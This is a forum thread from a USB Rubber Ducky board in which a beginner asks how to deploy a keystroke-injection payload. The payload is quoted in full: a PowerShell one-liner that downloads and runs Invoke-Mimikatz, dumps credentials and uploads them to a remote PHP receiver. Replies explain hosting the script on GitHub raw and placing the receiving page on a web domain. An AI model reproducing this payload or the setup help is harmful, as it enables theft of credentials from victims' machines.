Jump to content

Invoke mimiKatz

nobama2

By nobama2
in Classic USB Rubber Ducky

 Share

Recommended Posts

nobama2 Newbie

nobama2

Posted
Posted

Be patient with me I am a newbie. I am trying to use rubber ducky and the invoke mimikatz powershell script.\

REM Download and execute Invoke Mimikatz then upload the results
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://darren.kitchen/rx.php', $output)"

 

I assume download string downloads the file  im.ps1 from the http web site (not darrens of coarse) runs it and dumps results in file rx.php  and uploads it  webserver via http.

I set up a webpage on domain.com and tried to upload im.ps1 but could not, told not allowed. Poweshell file. That is wheree I am stuck. Any help appreciated.

Link to comment
Share on other sites
Tw1sT Newbie

Tw1sT

Posted
Posted

Sign up for a Github account (if you haven't already) and upload the .ps1 to your Github page.  Next click open the "Raw" version of the .ps1 you uploaded. Copy the URL from your browser (should be something like "http://raw.githubusercontent.com/YOUR USERNAME/YOUR REPO/im.ps1") and put that in the DuckyScript use your domain.com page to host the cred receiving php script. Let me know if you need any more help.

Link to comment
Share on other sites
ThoughtfulDev Newbie

ThoughtfulDev

Posted
Posted
11 minutes ago, mhuggins said:

ok does it matter where in the file sturcture or just the root of the website directory

it does not matter you just have to change the the url accordingly e.g if its in root then you just need yourdomain.com/rx.php.

if its in e.g a folder called ducky you need to use yourdomain.com/ducky/rx.php 

Link to comment
Share on other sites
mhuggins Newbie

mhuggins

Posted
Posted
Just now, ThoughtfulDev said:

it does not matter you just have to change the the url accordingly e.g if its in root then you just need yourdomain.com/rx.php.

if its in e.g a folder called ducky you need to use yourdomain.com/ducky/rx.php 

thanks ill give it a try

Link to comment
Share on other sites
mhuggins Newbie

mhuggins

Posted
Posted
3 minutes ago, ThoughtfulDev said:

it does not matter you just have to change the the url accordingly e.g if its in root then you just need yourdomain.com/rx.php.

if its in e.g a folder called ducky you need to use yourdomain.com/ducky/rx.php 

one last thing .... what format do i save the rx file.  just open notepad paste it then save as ....... php?

Link to comment
Share on other sites
ThoughtfulDev Newbie

ThoughtfulDev

Posted
Posted
Just now, mhuggins said:

one last thing .... what format do i save the rx file.  just open notepad paste it then save as ....... php?

Yep just save it as a .php file.

To me it seems that you need to gain some basic knowledge. Not wanting to be rude or sth ^^

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...